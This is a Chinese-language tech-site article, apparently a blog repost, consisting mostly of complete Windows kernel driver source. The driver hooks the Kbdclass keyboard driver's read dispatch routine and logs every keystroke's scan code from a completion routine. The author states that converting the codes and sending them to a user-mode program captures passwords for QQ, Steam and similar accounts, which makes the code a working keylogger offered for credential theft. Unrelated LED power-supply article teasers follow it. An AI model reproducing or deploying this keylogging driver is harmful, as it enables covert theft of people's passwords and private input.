当前位置:首页 > > 充电吧
[导读]【1】方式:替换Kbdclass驱动的ReadFile IRP函数处理指针编写.sys文件:头文件:#pragma once                                      

【1】方式:替换Kbdclass驱动的ReadFile IRP函数处理指针


编写.sys文件:


头文件:


#pragma once                                                 //只编译1次头文件
#include//驱动函数头文件,类似于Windows.h
#include//WDK函数头文件,一般编写驱动程序时,与ntddk.h一起包含
#include//UNICODE和ANSI字符串头文件
#include//安全字符串函数头文件
#include//扫描码结构体需要包含的头文件
#include//创建通信设备对象(不用管理员权限就能打开)
#pragma comment(lib,"ntstrsafe.lib")                         //安全字符串函数库文件

//#define KBD_DRIVER_NAME  L"\Driver\Kbdclass"
#define KBD_DRIVER_NAME  L"\Driver\Kbdclass"
//调用延迟函数的延迟长度的宏
#define  DELAY_ONE_MILLISECOND (-10 * 1000) //1毫秒
//可通过[驱动对象DRIVER_NAME名称路径]获得[该驱动对象的DRIVER_OBJECT指针]
NTSTATUS
ObReferenceObjectByName(
	PUNICODE_STRING ObjectName,
	ULONG Attributes,
	PACCESS_STATE AccessState,
	ACCESS_MASK DesiredAccess,
	POBJECT_TYPE ObjectType,
	KPROCESSOR_MODE AccessMode,
	PVOID ParseContext,
	PVOID *Object
);
VOID DriverUnload(PDRIVER_OBJECT pDriverObj);
NTSTATUS OpenTagDevice(wchar_t* DriObj);
NTSTATUS Read(
	PDEVICE_OBJECT pDevObj,
	PIRP pIrp
);
//读IRP请求处理函数
NTSTATUS c2pReadComplete
(
	IN PDEVICE_OBJECT DeviceObject,     //目标设备对象
	IN PIRP Irp,                        //IRP指针
	IN PVOID Context                    //该自定义参数为:过滤设备对象
);

源文件:



#include "Dev.h"
extern POBJECT_TYPE* IoDriverObjectType;   //用于调用ObReferenceObjectByName API时,获取Kbdclass驱动对象指针,所带入的[对象类型]
                                           //由于是指针,所以带入时,为:*IoDriverObjectType;
PDRIVER_OBJECT gDriverObject = NULL;       //本驱动程序的[驱动对象]

PDRIVER_OBJECT gTagDriverObj = NULL;       //目标[驱动对象]
PDRIVER_DISPATCH YuanReadFunc = NULL;      //原目标[驱动对象]的函数指针

ULONG gIrpCount = 0;

NTSTATUS DriverEntry
(
	 PDRIVER_OBJECT DriverObject,          //本驱动程序的[驱动对象]
	 PUNICODE_STRING RegistryPath          //此驱动在注册表中的路径.
)
{
	KdPrint(("Aaron::DriverEntryn"));
	
	NTSTATUS status = STATUS_SUCCESS;

	//保存本驱动程序的[驱动对象]到全局变量
	gDriverObject = DriverObject;
	 
	//取目标驱动对象
	status = OpenTagDevice(KBD_DRIVER_NAME);
	if (!NT_SUCCESS(status))
		return status;
	//指针变量
	volatile PVOID TagFunc = gTagDriverObj->MajorFunction + IRP_MJ_READ;
	YuanReadFunc = InterlockedExchangePointer(TagFunc, Read);

	//设置[驱动卸载]函数指针
	DriverObject->DriverUnload = DriverUnload;
	//返回最终状态
	return status;
}
NTSTATUS OpenTagDevice(wchar_t* DriObj)
{
	NTSTATUS status;
	UNICODE_STRING DriName;
	RtlInitUnicodeString(&DriName, DriObj);
	PDRIVER_OBJECT TagDri;
	status = ObReferenceObjectByName(&DriName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL,&TagDri);
	if (!NT_SUCCESS(status))
		return status;
	ObDereferenceObject(TagDri);
	gTagDriverObj = TagDri;
	return status;
}
//卸载函数
VOID DriverUnload(PDRIVER_OBJECT pDriverObj)
{//由于卸载时,一般有一个未完成的IRP请求,当这个IRP完成时,会执行c2pReadComplete完成例程,但完成例程不存在了
 //导致蓝屏,所以要等待这个IRP完成,然后卸载.
	volatile PVOID TagFunc = gTagDriverObj->MajorFunction + IRP_MJ_READ;
	InterlockedExchangePointer(TagFunc, YuanReadFunc);

	//将32位扩展至64位变量中.
	LARGE_INTEGER lDelay = RtlConvertLongToLargeInteger(10 * DELAY_ONE_MILLISECOND); //1毫秒 × 100 = 100毫秒,1000毫秒才等于1秒
	//得到不公开的线程结构体指针
	PRKTHREAD CurrentThread = KeGetCurrentThread();
	//把当前线程设置为[低实时模式],以便让它的运行尽量少影响其他程序  16 (0~31)
	KeSetPriorityThread(CurrentThread, LOW_REALTIME_PRIORITY);
	//等待IRP完成,就要用一个变量记录是否无IRP数量了.
	while (gIrpCount)
		KeDelayExecutionThread(KernelMode, FALSE, &lDelay);
	KdPrint(("Aaron::驱动程序卸载成功!n"));
}
//ReadFile处理函数
NTSTATUS Read(               
	PDEVICE_OBJECT pDevObj,  
	PIRP pIrp               
)
{
	gIrpCount++;
	PIO_STACK_LOCATION IrpSp = IoGetCurrentIrpStackLocation(pIrp);
	//IrpSp->Context = 这个是自定义参数
	IrpSp->Control = SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL;
	IrpSp->CompletionRoutine = (PIO_COMPLETION_ROUTINE)c2pReadComplete;
	return YuanReadFunc(pDevObj, pIrp);
}
//读IRP完成例程
NTSTATUS c2pReadComplete
(
	IN PDEVICE_OBJECT DeviceObject,     //目标设备对象
	IN PIRP Irp,                        //IRP指针
	IN PVOID Context                    //该自定义参数为:过滤设备对象
)
{
	PIO_STACK_LOCATION IrpSp;           //I/O堆栈指针
	ULONG_PTR buf_len = 0;
	PKEYBOARD_INPUT_DATA buf = NULL;
	size_t i;
	//获取当前I/O堆栈指针
	IrpSp = IoGetCurrentIrpStackLocation(Irp);
	//如果IRP请求是成功的
	if (NT_SUCCESS(Irp->IoStatus.Status))
	{
		//得到扫描码缓冲区
		buf = Irp->AssociatedIrp.SystemBuffer;
		buf_len = Irp->IoStatus.Information;
		ULONG_PTR aaKeyCount = buf_len / sizeof(KEYBOARD_INPUT_DATA);
		for (ULONG_PTR i = 0; i < aaKeyCount; i++)
		{
			DbgPrint("键盘码:%02xn",buf->MakeCode);
			buf++;
		}
	}
	if (Irp->PendingReturned)
		IoMarkIrpPending(Irp);
	//IRP总数-- 
	gIrpCount--;
	return Irp->IoStatus.Status;
}


已经把扫描码给读出来的,自己转化成ASCII码,与应用层软件通信即可.


QQ、Steam等等的密码都可以获取到.(网银除外)


关于有个小问题:

这里设置IRP请求的完成例程时,不是直接调用的IoSetCompletionRoutine,而是手动设置上去的完成例程.

原因是IoSetCompletionRoutine好像是帮设备栈的下一个设备对象的I/O堆栈指针中的完成例程,导致完成例程函数

不执行.


【效果】


本站声明: 本文章由作者或相关机构授权发布,目的在于传递更多信息,并不代表本站赞同其观点,本站亦不保证或承诺内容真实性等。需要转载请联系该专栏作者,如若文章内容侵犯您的权益,请及时联系本站删除。
换一批
延伸阅读

LED驱动电源的输入包括高压工频交流(即市电)、低压直流、高压直流、低压高频交流(如电子变压器的输出)等。

关键字: 驱动电源

在工业自动化蓬勃发展的当下,工业电机作为核心动力设备,其驱动电源的性能直接关系到整个系统的稳定性和可靠性。其中,反电动势抑制与过流保护是驱动电源设计中至关重要的两个环节,集成化方案的设计成为提升电机驱动性能的关键。

关键字: 工业电机 驱动电源

LED 驱动电源作为 LED 照明系统的 “心脏”,其稳定性直接决定了整个照明设备的使用寿命。然而,在实际应用中,LED 驱动电源易损坏的问题却十分常见,不仅增加了维护成本,还影响了用户体验。要解决这一问题,需从设计、生...

关键字: 驱动电源 照明系统 散热

根据LED驱动电源的公式,电感内电流波动大小和电感值成反比,输出纹波和输出电容值成反比。所以加大电感值和输出电容值可以减小纹波。

关键字: LED 设计 驱动电源

电动汽车(EV)作为新能源汽车的重要代表,正逐渐成为全球汽车产业的重要发展方向。电动汽车的核心技术之一是电机驱动控制系统,而绝缘栅双极型晶体管(IGBT)作为电机驱动系统中的关键元件,其性能直接影响到电动汽车的动力性能和...

关键字: 电动汽车 新能源 驱动电源

在现代城市建设中,街道及停车场照明作为基础设施的重要组成部分,其质量和效率直接关系到城市的公共安全、居民生活质量和能源利用效率。随着科技的进步,高亮度白光发光二极管(LED)因其独特的优势逐渐取代传统光源,成为大功率区域...

关键字: 发光二极管 驱动电源 LED

LED通用照明设计工程师会遇到许多挑战,如功率密度、功率因数校正(PFC)、空间受限和可靠性等。

关键字: LED 驱动电源 功率因数校正

在LED照明技术日益普及的今天,LED驱动电源的电磁干扰(EMI)问题成为了一个不可忽视的挑战。电磁干扰不仅会影响LED灯具的正常工作,还可能对周围电子设备造成不利影响,甚至引发系统故障。因此,采取有效的硬件措施来解决L...

关键字: LED照明技术 电磁干扰 驱动电源

开关电源具有效率高的特性,而且开关电源的变压器体积比串联稳压型电源的要小得多,电源电路比较整洁,整机重量也有所下降,所以,现在的LED驱动电源

关键字: LED 驱动电源 开关电源

LED驱动电源是把电源供应转换为特定的电压电流以驱动LED发光的电压转换器,通常情况下:LED驱动电源的输入包括高压工频交流(即市电)、低压直流、高压直流、低压高频交流(如电子变压器的输出)等。

关键字: LED 隧道灯 驱动电源
关闭